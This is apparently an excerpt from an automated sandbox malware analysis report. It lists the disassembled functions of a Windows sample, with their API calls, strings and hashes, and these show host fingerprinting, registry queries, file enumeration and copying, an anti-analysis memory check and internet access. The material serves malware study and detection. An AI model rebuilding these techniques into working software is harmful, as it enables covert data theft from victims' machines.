ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

<, xrefs: 004112AC
"" , xrefs: 004111DC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF
.dll, xrefs: 00411054

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: e82ce7f6c57b8774571db6737057bc645d43312c36c1b6918e29c571b1894596
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: e82ce7f6c57b8774571db6737057bc645d43312c36c1b6918e29c571b1894596
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,02F554E8), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,02F4EB70), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,02F556C8), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 1dc9003e9ebd5ace104906470e6436b38e122a00586f4aaa14a311959199509f
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: 1dc9003e9ebd5ace104906470e6436b38e122a00586f4aaa14a311959199509f
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,02F51738), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: 10be20341b0695d362eb0d6266f720a3ad7c31bf166b167429c0ecf6645162d8
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: 10be20341b0695d362eb0d6266f720a3ad7c31bf166b167429c0ecf6645162d8
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,02F4BEA8,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,02F55648,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,02F4C228,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,02F55350,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02F518F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(02F55748,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(02F518F8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 9ddceffa11d6586fe54cbc1d28c17a58377f836902bb1714d148554c16b0be05
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 9ddceffa11d6586fe54cbc1d28c17a58377f836902bb1714d148554c16b0be05
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
:h@, xrefs: 004065DD, 004065FD, 0040667F
@:h@, xrefs: 00406670, 00406673

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: dba92d8b7def6e5fa5e099d08b3c3e89d3165a25a209367253dd29872c5ff0a2
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: dba92d8b7def6e5fa5e099d08b3c3e89d3165a25a209367253dd29872c5ff0a2
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02F4C228,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02F55350,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F55668,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F517A8), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F55668,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F517A8), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F518D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F553C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F55A08,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02F553C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F55A08,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,02F55688,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02F55260,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02F4BEA8,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02F55648,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F55428,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F55410), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02F53108,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: b817c881d99d51f5a8c671ca54a45bf4726cdfd2472ed4ed8427f5b6838a8b43
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
